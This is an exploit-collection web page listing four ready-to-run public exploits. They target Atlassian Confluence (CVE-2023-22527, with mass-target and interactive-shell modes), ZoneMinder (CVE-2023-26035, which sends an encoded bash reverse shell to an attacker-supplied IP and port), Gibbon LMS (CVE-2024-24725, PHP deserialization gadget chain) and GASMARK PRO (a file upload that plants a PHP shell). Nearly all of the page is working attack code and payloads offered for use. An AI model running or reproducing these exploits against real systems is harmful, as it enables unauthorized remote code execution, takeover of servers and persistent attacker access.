Latest exploits :: CodePwn

<pre><code># Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability # Date: 25/1/2024 # Exploit Author: MaanVader # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://www.atlassian.com/software/confluence # Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 # Tested on: 8.5.3 # CVE : CVE-2023-22527 import requests import argparse import urllib3 from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from rich.console import Console # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Argument parsing parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.") parser.add_argument("-u", "--url", help="Single Confluence Server URL") parser.add_argument("-f", "--file", help="File containing list of IP addresses") parser.add_argument("-c", "--command", help="Command to Execute") parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL") args = parser.parse_args() # Rich console for formatted output console = Console() # Function to send payload def send_payload(url, command): headers = { 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded' } payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027' '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n') headers['Content-Length'] = str(len(payload)) full_url = f"{url}/template/aui/text-inline.vm" response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False) return response.text.split('<!DOCTYPE html>')[0].strip() # Interactive shell function def interactive_shell(url): session = PromptSession() console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]") while True: try: cmd = session.prompt(HTML("<ansired>$ </ansired>")) if cmd.lower() in ["exit", "quit"]: break response = send_payload(url, cmd) console.print(response) except KeyboardInterrupt: break except Exception as e: console.print(f"[bold red]Error: {e}[/bold red]") break # Process file function def process_file(file_path): with open(file_path, 'r') as file: for line in file: ip = line.strip() url = f"http://{ip}:8090" console.print(f"Processing {url}") print(send_payload(url, args.command)) # Main execution logic if args.shell and args.url: interactive_shell(args.url) elif args.url and args.command: print(send_payload(args.url, args.command)) elif args.file and args.command: process_file(args.file) else: print("Error: Please provide a valid URL and a command or use the interactive shell option.") </code></pre>

<pre><code>import re import requests from bs4 import BeautifulSoup import argparse import base64 # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots # Date: 12 December 2023 # Discovered by : @Unblvr1 # Exploit Author: Ravindu Wickramasinghe (@rvizx9) # Vendor Homepage: https://zoneminder.com/ # Software Link: https://github.com/ZoneMinder/zoneminder # Version: prior to 1.36.33 and 1.37.33 # Tested on: Arch Linux, Kali Linux # CVE : CVE-2023-26035 # Github Link : https://github.com/rvizx/CVE-2023-26035 class ZoneMinderExploit: def __init__(self, target_uri): self.target_uri = target_uri self.csrf_magic = None def fetch_csrf_token(self): print("[>] fetching csrt token") response = requests.get(self.target_uri) self.csrf_magic = self.get_csrf_magic(response) if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic): print(f"[>] recieved the token: {self.csrf_magic}") return True print("[!] unable to fetch or parse token.") return False def get_csrf_magic(self, response): return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None) def execute_command(self, cmd): print("[>] sending payload..") data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic} response = requests.post(f"{self.target_uri}/index.php", data=data) print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload") def exploit(self, payload): if self.fetch_csrf_token(): print(f"[>] executing...") self.execute_command(payload) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-t', '--target-url', required=True, help='target url endpoint') parser.add_argument('-ip', '--local-ip', required=True, help='local ip') parser.add_argument('-p', '--port', required=True, help='port') args = parser.parse_args() # generating the payload ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" ps2 = base64.b64encode(ps1.encode()).decode() payload = f"echo {ps2} | base64 -d | /bin/bash" ZoneMinderExploit(args.target_url).exploit(payload) </code></pre>

<pre><code># Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("[X] Login successful!") return Session_Cookie[4] def generate_payload(command): # Given base64-encoded string ### Actual Payload: ### a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B} base64_encoded_string = 'YToyOntpOjclM0JPOjMyOiJNb25vbG9nXEhhbmRsZXJcU3lzbG9nVWRwSGFuZGxlciI6MTp7czo5OiIlMDAqJTAwc29ja2V0IiUzQk86Mjk6Ik1vbm9sb2dcSGFuZGxlclxCdWZmZXJIYW5kbGVyIjo3OntzOjEwOiIlMDAqJTAwaGFuZGxlciIlM0JyOjMlM0JzOjEzOiIlMDAqJTAwYnVmZmVyU2l6ZSIlM0JpOi0xJTNCczo5OiIlMDAqJTAwYnVmZmVyIiUzQmE6MTp7aTowJTNCYToyOntpOjAlM0JzOkNPTU1BTkRfU0laRToiQ09NTUFORCIlM0JzOjU6ImxldmVsIiUzQk4lM0J9fXM6ODoiJTAwKiUwMGxldmVsIiUzQk4lM0JzOjE0OiIlMDAqJTAwaW5pdGlhbGl6ZWQiJTNCYjoxJTNCczoxNDoiJTAwKiUwMGJ1ZmZlckxpbWl0IiUzQmk6LTElM0JzOjEzOiIlMDAqJTAwcHJvY2Vzc29ycyIlM0JhOjI6e2k6MCUzQnM6NzoiY3VycmVudCIlM0JpOjElM0JzOjY6InN5c3RlbSIlM0J9fX1pOjclM0JpOjclM0J9' command_size = len(command) # Decode base64 decoded_bytes = base64.b64decode(base64_encoded_string) decoded_string = decoded_bytes.decode('utf-8') # URL decode payload = urllib.parse.unquote(decoded_string) # Replace placeholders in the decoded string payload = payload.replace('COMMAND_SIZE', str(command_size)) payload = payload.replace('COMMAND', command) print("[X] Payload Generated!") return payload def rce(cookie, target_host, target_port, command): url = f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------104550429928543086952438317710","Cookie": cookie} payload = generate_payload(command) data = f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="address"\r\n\r\n/modules/System Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="csvData"\r\n\r\n"External Assessment","Assessment Date","Student","Field Name Category","Field Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: form-data; name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--' r = requests.post(url, headers=headers, data=data, allow_redirects=False) print("[X] Request sent!") start_index = r.text.find("<h2>Step 4 - Live Run</h2>") end_index = r.text.find("<div class", start_index) result = r.text[start_index+26:end_index].strip() if result != '': print("[X] Execution result: \n"+result) else: print("[X] Command failed or did not output anything.") with open("pocresponse.html", "wb") as f: f.write(r.content) if __name__ == '__main__': if len(sys.argv) != 6: print("[X] Usage: script.py <target_host> <target_port> <email> <password> <command>") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5]) </code></pre>

<pre><code>## Title: GASMARK PRO-1.0 File Upload RCE ## Author: nu11secur1ty ## Date: 03/17/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html ## Reference: https://portswigger.net/web-security/file-upload ## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/ ## Description: Vulnerable input: `<input type="file" class="form-control" id="productImage" name="productImage" style="width:auto;">` This application suffers from shell upload and remote code execution vulnerability, the attacker easily can destroy this system, when he has credentials. STATUS: HIGH- Vulnerability CRITICAL [+]Exploit: ```PHP POST /gasmark/gasmark/php_action/createclient.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=1afinf22p9snl2nai24g29duuc Content-Length: 1063 Cache-Control: max-age=0 Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/gasmark/gasmark/add_client.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i Connection: close ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="currnt_date" ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="name" pwned ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="gender" Female ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="mob_no" 1234 ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="reffering" 1234 ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="address" 1234 ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php" Content-Type: application/octet-stream <?php // by nu11secur1ty - 2023 $fh = fopen('test.html', 'a'); fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>'); fclose($fh); //nlink('test.html'); ?> ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB Content-Disposition: form-data; name="create" ------WebKitFormBoundaryb4PfTJ8hUNsEjxtB-- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html) ## Time spent: 00:25:00 </code></pre>